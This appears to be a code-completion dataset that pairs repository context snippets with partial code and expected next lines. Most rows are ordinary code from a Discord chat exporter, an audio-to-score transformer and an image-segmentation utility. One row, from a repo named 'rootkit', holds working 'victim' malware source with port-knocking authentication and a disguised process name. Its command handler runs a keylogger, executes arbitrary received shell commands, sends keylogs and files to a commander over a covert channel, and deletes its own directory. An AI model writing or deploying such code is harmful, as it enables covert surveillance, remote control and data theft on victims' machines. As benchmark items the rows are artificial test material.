"snippet": "class Component:\r\n styles = {\r\n \"primary\": \"#5865F2\",\r\n \"secondary\": \"#4F545C\",\r\n \"success\": \"#2D7D46\",\r\n \"danger\": \"#D83C3E\",\r\n \"blurple\": \"#5865F2\",\r\n \"grey\": \"#4F545C\",\r\n \"gray\": \"#4F545C\",\r\n \"green\": \"#2D7D46\",\r\n \"red\": \"#D83C3E\",\r\n \"link\": \"#4F545C\",\r\n }\r\n\r\n components: str = \"\"\r\n menus: str = \"\"\r\n buttons: str = \"\"\r\n menu_div_id: int = 0\r\n\r\n def __init__(self, component, guild):\r\n self.component = component\r\n self.guild = guild\r\n\r\n async def build_component(self, c):\r\n if isinstance(c, discord.Button):\r\n await self.build_button(c)\r\n elif isinstance(c, discord.SelectMenu):\r\n await self.build_menu(c)\r\n Component.menu_div_id += 1\r\n\r\n async def build_button(self, c):\r\n url = c.url if c.url else \"\"\r\n label = c.label if c.label else \"\"\r\n style = self.styles[str(c.style).split(\".\")[1]]\r\n icon = DiscordUtils.button_external_link if url else \"\"\r\n emoji = str(c.emoji) if c.emoji else \"\"\r\n\r\n self.buttons += await fill_out(self.guild, component_button, [\r\n (\"DISABLED\", \"chatlog__component-disabled\" if c.disabled else \"\", PARSE_MODE_NONE),\r\n (\"URL\", str(url), PARSE_MODE_NONE),\r\n (\"LABEL\", str(label), PARSE_MODE_MARKDOWN),\r\n (\"EMOJI\", str(emoji), PARSE_MODE_EMOJI),\r\n (\"ICON\", str(icon), PARSE_MODE_NONE),\r\n (\"STYLE\", style, PARSE_MODE_NONE)\r\n ])\r\n\r\n async def build_menu(self, c):\r\n placeholder = c.placeholder if c.placeholder else \"\"\r\n options = c.options\r\n content = \"\"\r\n\r\n if not c.disabled:\r\n content = await self.build_menu_options(options)\r\n\r\n self.menus += await fill_out(self.guild, component_menu, [\r\n (\"DISABLED\", \"chatlog__component-disabled\" if c.disabled else \"\", PARSE_MODE_NONE),\r\n (\"ID\", str(self.menu_div_id), PARSE_MODE_NONE),\r\n (\"PLACEHOLDER\", str(placeholder), PARSE_MODE_MARKDOWN),\r\n (\"CONTENT\", str(content), PARSE_MODE_NONE),\r\n (\"ICON\", DiscordUtils.interaction_dropdown_icon, PARSE_MODE_NONE),\r\n ])\r\n\r\n async def build_menu_options(self, options):\r\n content = []\r\n for option in options:\r\n if option.emoji:\r\n content.append(await fill_out(self.guild, component_menu_options_emoji, [\r\n (\"EMOJI\", str(option.emoji), PARSE_MODE_EMOJI),\r\n (\"TITLE\", str(option.label), PARSE_MODE_MARKDOWN),\r\n (\"DESCRIPTION\", str(option.description) if option.description else \"\", PARSE_MODE_MARKDOWN)\r\n ]))\r\n else:\r\n content.append(await fill_out(self.guild, component_menu_options, [\r\n (\"TITLE\", str(option.label), PARSE_MODE_MARKDOWN),\r\n (\"DESCRIPTION\", str(option.description) if option.description else \"\", PARSE_MODE_MARKDOWN)\r\n ]))\r\n\r\n if content:\r\n content = f'<div id=\"dropdownMenu{self.menu_div_id}\" class=\"dropdownContent\">{\"\".join(content)}</div>'\r\n\r\n return content\r\n\r\n async def flow(self):\r\n for c in self.component.children:\r\n await self.build_component(c)\r\n\r\n if self.menus:\r\n self.components += f'<div class=\"chatlog__components\">{self.menus}</div>'\r\n\r\n if self.buttons:\r\n self.components += f'<div class=\"chatlog__components\">{self.buttons}</div>'\r\n\r\n return self.components\r"
},
{
"identifier": "clear_cache",
"path": "chat_exporter/ext/cache.py",
"snippet": "def clear_cache():\r\n _internal_cache.clear()\r"
},
{
"identifier": "pass_bot",
"path": "chat_exporter/parse/mention.py",
"snippet": "def pass_bot(_bot):\r\n # Bot is used to fetch a user who is no longer inside a guild\r\n # This will stop the user from appearing as 'Unknown' which some people do not want\r\n global bot\r\n bot = _bot\r"
},
{
"identifier": "DiscordUtils",
"path": "chat_exporter/ext/discord_utils.py",
"snippet": "class DiscordUtils:\r\n logo: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-logo.svg'\r\n default_avatar: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-default.png'\r\n pinned_message_icon: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-pinned.svg'\r\n thread_channel_icon: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-thread.svg'\r\n file_attachment_audio: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-audio.svg'\r\n file_attachment_acrobat: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-acrobat.svg'\r\n file_attachment_webcode: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-webcode.svg'\r\n file_attachment_code: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-code.svg'\r\n file_attachment_document: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-document.svg'\r\n file_attachment_archive: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-archive.svg'\r\n file_attachment_unknown: str = 'https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-unknown.svg'\r\n button_external_link: str = '<img class=\"chatlog__reference-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-external-link.svg\">'\r\n reference_attachment_icon: str = '<img class=\"chatlog__reference-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-attachment.svg\">'\r\n interaction_command_icon: str = '<img class=\"chatlog__interaction-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-command.svg\">'\r\n interaction_dropdown_icon: str = '<img class=\"chatlog__dropdown-icon\" src=\"https://cdn.jsdelivr.net/gh/mahtoid/DiscordUtils@master/discord-dropdown.svg\">'"
},
{
"identifier": "fill_out",
"path": "chat_exporter/ext/html_generator.py",
"snippet": "PARSE_MODE_NONE = 0\r\nPARSE_MODE_NO_MARKDOWN = 1\r\nPARSE_MODE_MARKDOWN = 2\r\nPARSE_MODE_EMBED = 3\r\nPARSE_MODE_SPECIAL_EMBED = 4\r\nPARSE_MODE_REFERENCE = 5\r\nPARSE_MODE_EMOJI = 6\r\nasync def fill_out(guild, base, replacements):\r\ndef read_file(filename):\r"
}
] | import datetime
import html
import traceback
import pytz
from typing import List, Optional
from chat_exporter.ext.discord_import import discord
from chat_exporter.construct.message import gather_messages
from chat_exporter.construct.assets.component import Component
from chat_exporter.ext.cache import clear_cache
from chat_exporter.parse.mention import pass_bot
from chat_exporter.ext.discord_utils import DiscordUtils
from chat_exporter.ext.html_generator import (
fill_out, total, channel_topic, meta_data_temp, fancy_time, channel_subject, PARSE_MODE_NONE
)
| 1,976 |
class TranscriptDAO:
html: str
def __init__(
self,
|
class TranscriptDAO:
html: str
def __init__(
self,
| channel: discord.TextChannel,
| 0 | 2023-12-18 14:17:31+00:00 | 4k |
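The Component helper in the context above resolves a button colour with self.styles[str(c.style).split(".")[1]]. The sketch below reproduces only that lookup with a stand-in enum (discord itself is not imported here), to show why splitting the "ClassName.member" string form on "." yields the style name; the enum and its members are invented for illustration, while the hex values match the styles table in the snippet.

    from enum import Enum

    class ButtonStyle(Enum):          # stand-in for the real discord enum
        primary = 1
        danger = 4

    styles = {"primary": "#5865F2", "danger": "#D83C3E"}

    def style_colour(style: Enum) -> str:
        # str(ButtonStyle.danger) -> "ButtonStyle.danger"; keep the member name
        return styles[str(style).split(".")[1]]

    assert style_colour(ButtonStyle.danger) == "#D83C3E"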
mariaalfaroc/a2s-transformer | networks/transformer/model.py | [
{
"identifier": "Decoder",
"path": "networks/transformer/decoder.py",
"snippet": "class Decoder(nn.Module):\n def __init__(\n self,\n # Classification layer\n output_size: int,\n # PE\n max_seq_len: int,\n # Embedding\n num_embeddings: int,\n embedding_dim: int = 256,\n padding_idx: int = 0,\n # Transformer\n ff_dim: int = 256,\n dropout_p: float = 0.1,\n nhead: int = 4,\n num_transformer_layers: int = 8,\n attn_window: int = -1, # -1 means \"no limit\"\n ):\n super(Decoder, self).__init__()\n\n # Input block\n self.embedding = nn.Embedding(\n num_embeddings=num_embeddings,\n embedding_dim=embedding_dim,\n padding_idx=padding_idx,\n )\n self.pos_1d = PositionalEncoding1D(\n max_len=max_seq_len,\n emb_dim=embedding_dim,\n dropout_p=dropout_p,\n )\n\n # Transformer block\n self.attn_window = attn_window\n self.transformer_decoder = nn.TransformerDecoder(\n decoder_layer=nn.TransformerDecoderLayer(\n d_model=embedding_dim,\n nhead=nhead,\n dim_feedforward=ff_dim,\n dropout=dropout_p,\n batch_first=True,\n ),\n num_layers=num_transformer_layers,\n )\n\n # Output/classification block\n self.out_layer = nn.Conv1d(\n in_channels=embedding_dim,\n out_channels=output_size,\n kernel_size=1,\n )\n\n def forward(self, tgt, memory, memory_len):\n # memory is the output of the encoder with the 2D PE added, flattened and permuted\n # memory.shape = [batch_size, src_sec_len, emb_dim]\n # src_sec_len = h * w (SPECTROGRAM UNFOLDING); emb_dim = out channels from encoder\n\n # tgt is the target sequence shifted to the right\n # tgt.shape = [batch_size, tgt_sec_len]\n\n # Embedding + 1D PE\n tgt_emb = self.pos_1d(\n self.embedding(tgt)\n ) # tgt_emb.shape = [batch_size, tgt_sec_len, emb_dim]\n\n # Get memory key padding mask\n # Ignore padding in the encoder output\n memory_key_padding_mask = self.get_memory_key_padding_mask(memory, memory_len)\n\n # Get tgt masks\n tgt_mask, tgt_key_padding_mask = self.get_tgt_masks(tgt)\n tgt_key_padding_mask = (\n None if memory_key_padding_mask is None else tgt_key_padding_mask\n ) # memory_key_padding_mask is None during inference\n\n # Transformer decoder\n tgt_pred = self.transformer_decoder(\n tgt=tgt_emb,\n memory=memory,\n tgt_mask=tgt_mask,\n memory_mask=None, # We let it see the whole encoder output\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n ) # tgt_pred.shape = [batch_size, tgt_sec_len, emb_dim]\n\n # Classification block\n tgt_pred = tgt_pred.permute(0, 2, 1).contiguous()\n tgt_pred = self.out_layer(\n tgt_pred\n ) # tgt_pred.shape = [batch_size, output_size, tgt_sec_len]\n\n return tgt_pred\n\n def get_memory_key_padding_mask(self, memory, memory_len):\n if memory_len is None:\n # During inference, the encoder output is not padded\n # We perform inference one sample at a time\n return None\n\n # When using batches, the spectrograms are padded to the same length\n # We need to mask the padding so the attention mechanism ignores it\n\n # memory.shape = [batch_size, src_sec_len, emb_dim]\n # memory_len.shape = [batch_size]\n # memory_pad_mask.shape = [batch_size, src_sec_len]\n # Value 1 (True) means \"ignored\" and value 0 (False) means \"not ignored\"\n memory_pad_mask = torch.zeros(\n memory.shape[:2], dtype=torch.bool, device=memory.device\n )\n for i, l in enumerate(memory_len):\n memory_pad_mask[i, l:] = True\n return memory_pad_mask\n\n @staticmethod\n def create_variable_window_mask( \n size, window_size, dtype=torch.float32, device=torch.device(\"cpu\")\n ):\n \"\"\"\n Creates a mask for the target sequence with a variable window size.\n\n Args:\n size (int): The size of 
the target sequence.\n window_size (int): The size of the window to focus on the last X tokens.\n\n Returns:\n torch.Tensor: The generated mask.\n \"\"\"\n mask = torch.full((size, size), float(\"-inf\"), dtype=dtype, device=device)\n for i in range(size):\n if window_size < size:\n start = max(0, i - window_size)\n mask[i, start : i + 1] = 0\n else:\n mask[i, : i + 1] = 0\n return mask\n\n def get_tgt_masks(self, tgt):\n # tgt.shape = [batch_size, tgt_sec_len]\n tgt_sec_len = tgt.shape[1]\n\n # Target = Decoder (we only let it see the past)\n # Upper triangular matrix of size (tgt_sec_len, tgt_sec_len)\n # The masked positions are filled with float('-inf')\n # Unmasked positions are filled with float(0.0)\n\n # ATTENTION WINDOW MECHANISM\n # We limit the number of past tokens the decoder can see\n if self.attn_window > 0:\n tgt_mask = self.create_variable_window_mask(\n tgt_sec_len, self.attn_window, device=tgt.device\n )\n else:\n tgt_mask = nn.Transformer.generate_square_subsequent_mask(\n tgt_sec_len, tgt.device\n )\n\n # 0 == \"<PAD>\"\n # Pad token to be ignored by the attention mechanism\n # Value 1 (True) means \"ignored\" and value 0 (False) means \"not ignored\"\n # tgt_pad_mask.shape = [batch_size, tgt_sec_len]\n tgt_pad_mask = tgt == 0\n return tgt_mask, tgt_pad_mask"
},
{
"identifier": "Encoder",
"path": "networks/transformer/encoder.py",
"snippet": "class Encoder(nn.Module):\n def __init__(self, in_channels, dropout=0.5):\n super(Encoder, self).__init__()\n self.conv_blocks = nn.ModuleList(\n [\n ConvBlock(in_c=in_channels, out_c=16, stride=(1, 1), dropout=dropout),\n ConvBlock(in_c=16, out_c=32, stride=(2, 2), dropout=dropout),\n ConvBlock(in_c=32, out_c=64, stride=(2, 2), dropout=dropout),\n ConvBlock(in_c=64, out_c=128, stride=(2, 2), dropout=dropout),\n ConvBlock(in_c=128, out_c=128, stride=(2, 1), dropout=dropout),\n ]\n )\n self.dscblocks = nn.ModuleList(\n [\n DSCBlock(in_c=128, out_c=128, stride=(1, 1), dropout=dropout),\n DSCBlock(in_c=128, out_c=128, stride=(1, 1), dropout=dropout),\n DSCBlock(in_c=128, out_c=128, stride=(1, 1), dropout=dropout),\n DSCBlock(in_c=128, out_c=256, stride=(1, 1), dropout=dropout),\n ]\n )\n\n def forward(self, x):\n for layer in self.conv_blocks:\n x = layer(x)\n\n for layer in self.dscblocks:\n xt = layer(x)\n x = x + xt if x.size() == xt.size() else xt\n\n return x"
},
{
"identifier": "HEIGHT_REDUCTION",
"path": "networks/transformer/encoder.py",
"snippet": "HEIGHT_REDUCTION = 16"
},
{
"identifier": "WIDTH_REDUCTION",
"path": "networks/transformer/encoder.py",
"snippet": "WIDTH_REDUCTION = 8"
},
{
"identifier": "compute_metrics",
"path": "my_utils/metrics.py",
"snippet": "def compute_metrics(y_true, y_pred):\n ################################# Sym-ER and Seq-ER:\n metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred)\n ################################# MV2H:\n mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred)\n metrics.update(mv2h_dict)\n return metrics"
},
{
"identifier": "IMG_HEIGHT",
"path": "my_utils/data_preprocessing.py",
"snippet": "IMG_HEIGHT = NUM_FREQ_BINS = 195"
},
{
"identifier": "NUM_CHANNELS",
"path": "my_utils/data_preprocessing.py",
"snippet": "NUM_CHANNELS = 1"
},
{
"identifier": "SOS_TOKEN",
"path": "my_utils/ar_dataset.py",
"snippet": "SOS_TOKEN = \"<SOS>\" # Start-of-sequence token"
},
{
"identifier": "EOS_TOKEN",
"path": "my_utils/ar_dataset.py",
"snippet": "EOS_TOKEN = \"<EOS>\" # End-of-sequence token"
}
] | import math
import random
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torchinfo import summary
from lightning.pytorch import LightningModule
from networks.transformer.decoder import Decoder
from networks.transformer.encoder import Encoder, HEIGHT_REDUCTION, WIDTH_REDUCTION
from my_utils.metrics import compute_metrics
from my_utils.data_preprocessing import IMG_HEIGHT, NUM_CHANNELS
from my_utils.ar_dataset import SOS_TOKEN, EOS_TOKEN | 2,864 |
class PositionalEncoding2D(nn.Module):
def __init__(self, num_channels, max_height, max_width, dropout_p: float = 0.1):
super(PositionalEncoding2D, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
pos_h = torch.arange(max_height).unsqueeze(1)
pos_w = torch.arange(max_width).unsqueeze(1)
den = torch.pow(10000, torch.arange(0, num_channels // 2, 2) / num_channels)
pe = torch.zeros(1, max_height, max_width, num_channels)
pe[0, :, :, 0 : num_channels // 2 : 2] = (
torch.sin(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, 1 : num_channels // 2 : 2] = (
torch.cos(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, num_channels // 2 :: 2] = (
torch.sin(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe[0, :, :, (num_channels // 2) + 1 :: 2] = (
torch.cos(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe = pe.permute(0, 3, 1, 2).contiguous()
self.register_buffer("pe", pe)
def forward(self, x):
# x.shape = [batch_size, num_channels, h, w]
x = x + self.pe[:, :, : x.size(2), : x.size(3)]
return self.dropout(x)
class A2STransformer(LightningModule):
def __init__(
self,
max_seq_len,
max_audio_len,
w2i,
i2w,
ytest_i2w=None,
attn_window=-1,
teacher_forcing_prob=0.5,
):
super(A2STransformer, self).__init__()
# Save hyperparameters
self.save_hyperparameters()
# Dictionaries
self.w2i = w2i
self.i2w = i2w
self.ytest_i2w = ytest_i2w if ytest_i2w is not None else i2w
self.padding_idx = w2i["<PAD>"]
# Model
self.max_seq_len = max_seq_len
self.teacher_forcing_prob = teacher_forcing_prob
self.encoder = Encoder(in_channels=NUM_CHANNELS)
self.pos_2d = PositionalEncoding2D(
num_channels=256,
max_height=math.ceil(IMG_HEIGHT / HEIGHT_REDUCTION),
max_width=math.ceil(max_audio_len / WIDTH_REDUCTION),
)
|
class PositionalEncoding2D(nn.Module):
def __init__(self, num_channels, max_height, max_width, dropout_p: float = 0.1):
super(PositionalEncoding2D, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
pos_h = torch.arange(max_height).unsqueeze(1)
pos_w = torch.arange(max_width).unsqueeze(1)
den = torch.pow(10000, torch.arange(0, num_channels // 2, 2) / num_channels)
pe = torch.zeros(1, max_height, max_width, num_channels)
pe[0, :, :, 0 : num_channels // 2 : 2] = (
torch.sin(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, 1 : num_channels // 2 : 2] = (
torch.cos(pos_w / den).unsqueeze(0).repeat(max_height, 1, 1)
)
pe[0, :, :, num_channels // 2 :: 2] = (
torch.sin(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe[0, :, :, (num_channels // 2) + 1 :: 2] = (
torch.cos(pos_h / den).unsqueeze(1).repeat(1, max_width, 1)
)
pe = pe.permute(0, 3, 1, 2).contiguous()
self.register_buffer("pe", pe)
def forward(self, x):
# x.shape = [batch_size, num_channels, h, w]
x = x + self.pe[:, :, : x.size(2), : x.size(3)]
return self.dropout(x)
class A2STransformer(LightningModule):
def __init__(
self,
max_seq_len,
max_audio_len,
w2i,
i2w,
ytest_i2w=None,
attn_window=-1,
teacher_forcing_prob=0.5,
):
super(A2STransformer, self).__init__()
# Save hyperparameters
self.save_hyperparameters()
# Dictionaries
self.w2i = w2i
self.i2w = i2w
self.ytest_i2w = ytest_i2w if ytest_i2w is not None else i2w
self.padding_idx = w2i["<PAD>"]
# Model
self.max_seq_len = max_seq_len
self.teacher_forcing_prob = teacher_forcing_prob
self.encoder = Encoder(in_channels=NUM_CHANNELS)
self.pos_2d = PositionalEncoding2D(
num_channels=256,
max_height=math.ceil(IMG_HEIGHT / HEIGHT_REDUCTION),
max_width=math.ceil(max_audio_len / WIDTH_REDUCTION),
) | self.decoder = Decoder( | 0 | 2023-12-18 20:01:00+00:00 | 4k |
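A quick shape check is a useful sanity test for the 2D positional encoding above. The sketch below assumes the PositionalEncoding2D class defined above is in scope; the tensor sizes are arbitrary illustrative values chosen to stay within max_height and max_width.

    import torch

    pe2d = PositionalEncoding2D(num_channels=256, max_height=16, max_width=64, dropout_p=0.0)
    feats = torch.zeros(2, 256, 12, 40)   # (batch, channels, h, w), as produced by the encoder
    out = pe2d(feats)
    assert out.shape == feats.shape       # the encoding is added, so the shape is unchanged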
YashsviG/rootkit | victim.py | [
{
"identifier": "port_knocking",
"path": "portknocker.py",
"snippet": "def port_knocking(victim_ip):\n \"\"\"\n Perform port knocking on the victim side to authenticate the commander.\n\n Args:\n victim_ip (str): IP address of the victim.\n\n Returns:\n tuple: IP address and port number if successful, None otherwise.\n \"\"\"\n potential_commanders = {}\n while True:\n packet = sniff(filter=f\"tcp and dst {victim_ip}\", count=1)[0]\n\n if TCP in packet and IP in packet:\n src_ip = packet[IP].src\n src_port = packet[TCP].dport\n\n if src_port in knock_ports:\n current_time = time.time()\n\n if src_ip not in potential_commanders:\n potential_commanders[src_ip] = []\n\n potential_commanders[src_ip].append((src_port, current_time))\n\n # Check if all knock ports have been hit within the timeout period\n print(potential_commanders)\n if len(potential_commanders[src_ip]) >= len(knock_ports):\n # Check for valid timestamps\n valid_timestamps = True\n for i, (port, timestamp) in enumerate(potential_commanders[src_ip]):\n if i == 0:\n continue\n\n previous_timestamp = potential_commanders[src_ip][i - 1][1]\n if abs(timestamp - previous_timestamp) > timeout:\n valid_timestamps = False\n potential_commanders.pop(src_ip)\n\n if valid_timestamps:\n # Successful port knocking sequence\n return src_ip, 7000\n\n # Wait for the next packet\n time.sleep(0.1)"
},
{
"identifier": "choose_process_name",
"path": "processname.py",
"snippet": "def choose_process_name():\n \"\"\"\n Choose a process name based on existing process names.\n\n Returns:\n str: Chosen process name.\n \"\"\"\n # Get a list of all existing process names\n existing_process_names = [p.name() for p in psutil.process_iter()]\n\n if existing_process_names:\n chosen_name = analyze_existing_process_names()\n else:\n chosen_name = \"nvme-update-wq\"\n\n print(f\"Process name chosen {chosen_name}\")\n return chosen_name"
},
{
"identifier": "get_ip_address",
"path": "utils.py",
"snippet": "def get_ip_address():\n \"\"\"\n Get the local IP address of the machine.\n\n Returns:\n str: Local IP address.\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.connect((\"8.8.8.8\", 80))\n name = s.getsockname()[0]\n return name"
},
{
"identifier": "transfer_keylog_file",
"path": "utils.py",
"snippet": "def transfer_keylog_file(keylogger, covert, file_path):\n \"\"\"\n Transfer the keylog file.\n\n Args:\n keylogger (Keylogger): Keylogger instance.\n covert (CovertChannel): Covert channel instance.\n file_path (str): Path of the keylog file.\n\n Returns:\n int: Status code (3 if unsuccessful).\n \"\"\"\n if keylogger.get_status():\n print(\"VICTIM:: Cannot transfer, Keylogger running\")\n return 3\n \n if not os.path.exists(file_path):\n print(\"VICTIM:: keylog.txt does not exist\")\n return 3\n \n covert.cmd = 0\n covert.send_data(for_victim=False)\n covert.cmd = None\n covert.file_name = file_path\n covert.send_data(for_victim=False, event=\"IN_CREATE\")\n covert.file_name = None\n os.remove(file_path)"
},
{
"identifier": "check_exists",
"path": "utils.py",
"snippet": "def check_exists(path):\n \"\"\"\n Check if a file or directory exists.\n\n Args:\n path (str): Path to check.\n\n Returns:\n bool: True if exists, False otherwise.\n \"\"\"\n if os.path.exists(path):\n return True\n return False"
}
] | import argparse
import setproctitle
import shutil
from keylogger import *
from watcher import *
from portknocker import port_knocking
from processname import choose_process_name
from utils import get_ip_address, transfer_keylog_file, check_exists
| 2,122 | covert.send_data(for_victim=False)
covert.cmd = None
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
return 7
elif not i:
print("VICTIM:: File Path Not Found")
return 7
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_file()
watcher.start_watching(covert, file)
return 7
elif command == 5:
print(f"VICTIM:: Received command to stop the watch file...")
if not watcher.get_status():
print("VICTIM:: Cannot stop the watcher, not Watching a File")
return 5
val = watcher.stop_watching()
return 5
elif command == 6:
print(f"VICTIM:: Received command to watch directory...")
direc = covert.receive_data(for_victim=True)
i = check_exists(direc)
if not i or watcher.get_status():
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
elif not i:
print("VICTIM:: Error, directory path not found")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_dir()
watcher.start_watching(covert, direc)
return 6
elif command == 7:
print(f"VICTIM:: Received command to stop the watch directory...")
if not watcher.get_status():
print("VICTIM:: Error, Not Watching a Directory")
return 7
val = watcher.stop_watching()
if val == 0:
print(f'VICTIM:: Stopped watching the directory')
return 7
elif command == 8:
print(f"VICTIM:: Received command to run a program...")
prog = covert.receive_data(for_victim=True)
try:
output = subprocess.check_output(prog, shell=True, universal_newlines=True)
if output:
covert.cmd = output
else:
covert.cmd = 1
covert.send_data(for_victim=False)
except subprocess.CalledProcessError as e:
print(f"Error: {e}")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 8
elif command == 9:
print(f"VICTIM:: Received command to send a file...")
file = covert.receive_data(for_victim=True)
if check_exists(file):
covert.cmd = None
covert.file_name = file
covert.send_data(for_victim=False, event="IN_CREATE")
covert.file_name = None
else:
print(f"VICTIM:: {file} does not exist")
return 9
elif command == 10:
print(f"VICTIM:: Receiving a file from the commander...")
covert.receive_data(for_victim=True)
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
return 10
elif command == 11:
print("VICTIM:: Disconnecting")
return 11
elif command == 12:
print("VICTIM:: Tearing down from the victim...")
current_directory = os.getcwd()
shutil.rmtree(current_directory)
return 12
else:
print("VICTIM:: Error, Unknown command")
return 13
def main():
|
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
i = check_exists(file)
if not i or watcher.get_status():
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
return 7
elif not i:
print("VICTIM:: File Path Not Found")
return 7
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_file()
watcher.start_watching(covert, file)
return 7
elif command == 5:
print(f"VICTIM:: Received command to stop the watch file...")
if not watcher.get_status():
print("VICTIM:: Cannot stop the watcher, not Watching a File")
return 5
val = watcher.stop_watching()
return 5
elif command == 6:
print(f"VICTIM:: Received command to watch directory...")
direc = covert.receive_data(for_victim=True)
i = check_exists(direc)
if not i or watcher.get_status():
if not watcher.init_watcher():
print("VICTIM:: Error, Watcher already running")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
elif not i:
print("VICTIM:: Error, directory path not found")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 6
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
watcher.toggle_dir()
watcher.start_watching(covert, direc)
return 6
elif command == 7:
print(f"VICTIM:: Received command to stop the watch directory...")
if not watcher.get_status():
print("VICTIM:: Error, Not Watching a Directory")
return 7
val = watcher.stop_watching()
if val == 0:
print(f'VICTIM:: Stopped watching the directory')
return 7
elif command == 8:
print(f"VICTIM:: Received command to run a program...")
prog = covert.receive_data(for_victim=True)
try:
output = subprocess.check_output(prog, shell=True, universal_newlines=True)
if output:
covert.cmd = output
else:
covert.cmd = 1
covert.send_data(for_victim=False)
except subprocess.CalledProcessError as e:
print(f"Error: {e}")
covert.cmd = 0
covert.send_data(for_victim=False)
covert.cmd = None
return 8
elif command == 9:
print(f"VICTIM:: Received command to send a file...")
file = covert.receive_data(for_victim=True)
if check_exists(file):
covert.cmd = None
covert.file_name = file
covert.send_data(for_victim=False, event="IN_CREATE")
covert.file_name = None
else:
print(f"VICTIM:: {file} does not exist")
return 9
elif command == 10:
print(f"VICTIM:: Receiving a file from the commander...")
covert.receive_data(for_victim=True)
covert.cmd = 1
covert.send_data(for_victim=False)
covert.cmd = None
return 10
elif command == 11:
print("VICTIM:: Disconnecting")
return 11
elif command == 12:
print("VICTIM:: Tearing down from the victim...")
current_directory = os.getcwd()
shutil.rmtree(current_directory)
return 12
else:
print("VICTIM:: Error, Unknown command")
return 13
def main():
| proc_name = choose_process_name()
| 1 | 2023-12-19 18:54:22+00:00 | 4k |
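The port_knocking routine above admits a source IP once every configured knock port has been hit and consecutive knocks arrive within a shared timeout. The sketch below factors a similar acceptance test into a pure function so it can be exercised without sniffing packets; the function name, port numbers and timeout are invented for illustration and are not taken from the snippet.

    def knocks_valid(knocks, knock_ports, timeout):
        """knocks: list of (port, timestamp) tuples in arrival order for one source IP."""
        if {p for p, _ in knocks} != set(knock_ports):
            return False                          # every knock port must have been hit
        return all(t2 - t1 <= timeout             # consecutive knocks must be close together
                   for (_, t1), (_, t2) in zip(knocks, knocks[1:]))

    assert knocks_valid([(7000, 0.0), (8000, 0.4), (9000, 0.9)], [7000, 8000, 9000], 1.0)
    assert not knocks_valid([(7000, 0.0), (8000, 5.0), (9000, 5.2)], [7000, 8000, 9000], 1.0)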
SunHan0426/tree_location | pspnet/utils/callbacks.py | [
{
"identifier": "cvtColor",
"path": "pspnet/utils/utils.py",
"snippet": "def cvtColor(image):\r\n if len(np.shape(image)) == 3 and np.shape(image)[-2] == 3:\r\n return image \r\n else:\r\n image = image.convert('RGB')\r\n return image \r"
},
{
"identifier": "preprocess_input",
"path": "pspnet/utils/utils.py",
"snippet": "def preprocess_input(image):\r\n image /= 255.0\r\n return image\r"
},
{
"identifier": "resize_image",
"path": "pspnet/utils/utils.py",
